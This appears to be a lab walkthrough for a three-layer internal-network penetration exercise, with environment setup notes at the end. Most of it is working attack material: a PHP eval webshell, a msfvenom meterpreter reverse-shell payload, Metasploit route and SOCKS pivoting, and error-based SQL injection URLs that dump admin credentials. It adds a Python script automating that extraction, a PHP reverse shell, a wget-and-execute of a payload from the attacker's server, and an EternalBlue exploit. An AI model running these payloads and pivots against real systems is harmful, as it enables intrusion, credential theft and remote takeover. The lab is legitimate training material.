Kali IP: 192.168.5.0/24 (the simulated external segment)
Quick Goby scan against the target first
Write a webshell:
echo '<?php @eval($_POST[a]);?>' > /www/wwwroot/ThinkPHP/public/shell.php
Connect with AntSword: http://192.168.5.143/shell.php
Generate the matching reverse-shell payload with msfvenom (note the space after -p):
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.5.144 LPORT=4444 -f elf > shell.elf
Run it on the target and catch the session in msf:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.5.144
set lport 4444
run
Get the internal subnets:
run get_local_subnets
Local subnet: 192.168.5.0/255.255.255.0
Local subnet: 192.168.22.0/255.255.255.0
Local subnet: 192.168.122.0/255.255.255.0
The 5 segment is the simulated external network, 22 is the internal network
Add a route through the session:
run autoroute -s 192.168.22.0/24
List the internal hosts the box already knows about:
arp -a
Set up a SOCKS proxy: use auxiliary/server/socks4a and run; it listens on 1080 by default. Point proxychains at it (socks4 127.0.0.1 1080 in /etc/proxychains4.conf on recent Kali).
Scan the 22 host (full-connect -sT because SYN scans cannot go through a SOCKS proxy, and -Pn because ICMP cannot either):
proxychains nmap -Pn -sT 192.168.22.22
Browser: set a SOCKS4 proxy on 127.0.0.1:1080
Layer 2 network
A single quote throws an error, so there is injection
Get the database name:
http://192.168.22.22/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,%20database(),0x7e),1)--+
List the tables (the updatexml() error shows only the first 32 characters of the XPath string, hence the substr() window; the leading 0x7e takes one of them, so each request really yields 31 characters):
http://192.168.22.22/index.php?r=vul&keyword=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+
Get the columns:
http://192.168.22.22/index.php?r=vul&keyword=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='bagecms' and table_name='bage_admin'),1,32),0x7e),1)--+
Get the values, i.e. the password (31 here for the reason above):
http://192.168.22.22/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select concat(username,0x7e,password) from bagecms.bage_admin),1,31),0x7e),1)--+
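The four requests above each leak one 31-character window; anything longer than that (a full group_concat of columns, a long password hash) needs the substr() offset walked until the data runs out. The script below is an added example, not part of the original write-up: it builds the same keyword payload for any offset, parses the window out of the MySQL XPATH error text, and loops until a short window signals the end. The target URL and the r=vul parameter are taken from the write-up; the trailing 0x7e is dropped because a full window truncates it anyway, and without it a short window unambiguously means end of data. fake_fetch and SECRET are constructed stand-ins for the vulnerable page so the example runs offline; in the lab you would pass a fetch function that does requests.get(url).text through proxychains.

```python
import re
from urllib.parse import quote, unquote

# Target and parameter from the write-up; everything else here is an assumption of this example.
BASE = "http://192.168.22.22/index.php"
# MySQL shows only the first 32 characters of the XPath string in the updatexml()
# error; the leading 0x7e marker uses one of them, so 31 data characters per request.
CHUNK = 31

ERR = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_payload(query, offset, chunk=CHUNK):
    """keyword value that leaks substr((query), offset, chunk) through the XPath error.
    No trailing 0x7e: in a full window it is cut off anyway, and without it a
    window shorter than `chunk` unambiguously means end of data."""
    return f"1' and updatexml(1,concat(0x7e,substr(({query}),{offset},{chunk})),1)--+"


def build_url(query, offset, chunk=CHUNK):
    """Full GET URL, everything percent-encoded (the write-up's %27 / %20 form)."""
    return f"{BASE}?r=vul&keyword={quote(build_payload(query, offset, chunk), safe='')}"


def parse_chunk(body):
    """Pull the leaked window out of the error text; None if the page did not error."""
    m = ERR.search(body)
    return m.group(1) if m else None


def dump(query, fetch, chunk=CHUNK, max_len=4096):
    """Walk substr() windows until one comes back shorter than `chunk` (or empty).
    `fetch(url) -> response body` is supplied by the caller."""
    out, offset = "", 1
    while offset <= max_len:
        piece = parse_chunk(fetch(build_url(query, offset, chunk)))
        if not piece:
            break
        out += piece
        if len(piece) < chunk:
            break
        offset += chunk
    return out


# Constructed stand-in for the vulnerable page so the example runs offline.
# SECRET is made up for this example and is not the lab's real admin row.
SECRET = "admin~3f2c0d8e4b6a1f9e7c5d2a8b4e6f1c0d9a7b5e3f"


def fake_fetch(url):
    """Answer like MySQL would: evaluate the substr() window over SECRET and
    truncate the XPath string shown in the error to 32 characters."""
    m = re.search(r"substr\(\(.*?\),(\d+),(\d+)\)", unquote(url))
    offset, length = int(m.group(1)), int(m.group(2))
    xpath = "~" + SECRET[offset - 1:offset - 1 + length]
    return f"XPATH syntax error: '{xpath[:32]}'"


if __name__ == "__main__":
    q = "select concat(username,0x7e,password) from bagecms.bage_admin"
    print(build_url(q, 1))
    print(dump(q, fake_fetch))
```

Asking for a 32-character window against fake_fetch still returns 31 characters, which is exactly the off-by-one you would silently hit chaining the write-up's `,1,32)` payloads with offsets 1, 33, 65, ...; stepping by 31 avoids it.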
Log in to the admin panel:
admin / 123qwe
Templates -> the tag page index.php, test writing there
Write a PHP reverse shell into it (ip and port come from the POST body):
<?php
set_time_limit(0);
$ip = $_POST['ip'];
$port = $_POST['port'];
$fp = @fsockopen($ip, $port, $errno, $errstr);
if (!$fp) {
    echo "error";
} else {
    fputs($fp, "\n+++++++++++++connect success+++++++++\n");
    while (!feof($fp)) {
        fputs($fp, "shell:");
        $shell = fgets($fp);
        $message = `$shell`;
        fputs($fp, $message);
    }
    fclose($fp);
}
Trigger it with a listener waiting on Kali: http://192.168.22.22/index.php?r=tag (POST ip and port)
Download shell.elf from that shell and upgrade to meterpreter:
On Kali: python -m SimpleHTTPServer 8000
In the shell:
wget http://192.168.5.31:8000/shell.elf
chmod 777 shell.elf (chmod +x is enough)
./shell.elf
Layer 3 network
Scan the 33 host through the new session (add the 192.168.33.0/24 route on it first, same autoroute step as before):
proxychains nmap -Pn -sT 192.168.33.33
At a glance 135 and 445 are open: time for EternalBlue
Check for MS17-010: auxiliary/scanner/smb/smb_ms17_010
Attack:
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.33
run
(bind_tcp because the Windows host has no path back to Kali; the bind connection goes out through the pivot routes instead)
Done.
Target download:
Link: https://pan.baidu.com/s/16Rd-3TpKLtFIf2ObWXxN6g
Extraction code: 957b
Environment setup:
CentOS, two NICs:
bridged
NAT 192.168.22.0/24
Log in, init 5 to switch to the desktop, configure the IPs in the GUI
Ubuntu, two NICs:
NAT 192.168.22.0/24
host-only 192.168.33.0/24
/etc/network/interfaces:
auto ens33
iface ens33 inet static
address 192.168.22.22
netmask 255.255.255.0
gateway 192.168.22.254
auto ens38
iface ens38 inet static
address 192.168.33.22
netmask 255.255.255.0
gateway 192.168.33.1
(two gateway lines give two default routes; ifupdown complains about the second but the interface still comes up, and nothing in 33 needs to route out anyway)
Win7, host-only